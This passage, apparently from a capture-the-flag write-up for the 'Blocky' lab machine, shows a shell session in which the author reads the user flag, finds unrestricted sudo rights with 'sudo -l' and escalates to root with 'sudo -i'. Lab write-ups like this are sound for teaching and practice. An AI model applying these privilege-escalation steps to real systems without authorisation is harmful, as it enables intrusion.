7 updates are security updates.

Last login: Tue Jul 25 11:14:53 2017 from 10.10.14.230
notch@Blocky:~$

Bingo, I opened a shell.

User Flag

notch@Blocky:~$ cat user.txt
<USER_FLAG>

Root flag

notch@Blocky:~$ whoami
notch
notch@Blocky:~$ sudo -l
[sudo] password for notch:
Matching Defaults entries for notch on Blocky:
   env_reset, mail_badpass,
   secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL
notch@Blocky:~$ sudo -i
root@Blocky:~# cat root.txt
<ROOT_FLAG>
root@Blocky:~#

I didn't expect an open sudo :)

Daniel Simao 17:56, 21 November 2019 (EST)